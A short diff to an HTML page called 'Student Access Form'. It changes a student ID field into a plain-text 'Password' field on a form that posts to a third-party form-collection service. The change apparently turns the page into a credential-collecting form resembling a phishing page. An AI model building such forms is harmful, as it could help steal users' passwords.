--- a/index.html
+++ b/index.html
@@ -51,7 +51,7 @@
 <form action="https://formspree.io/f/xyznbrvg" method="POST">
   <h2>Student Access Form</h2>
   <input type="text" name="username" placeholder="Username" required>
-  <input type="text" name="studentCode" placeholder="Student ID / Access Code" required>
+  <input type="text" name="Password" placeholder="Password" required>
   <button type="submit">Submit</button>
 </form>
 </body>
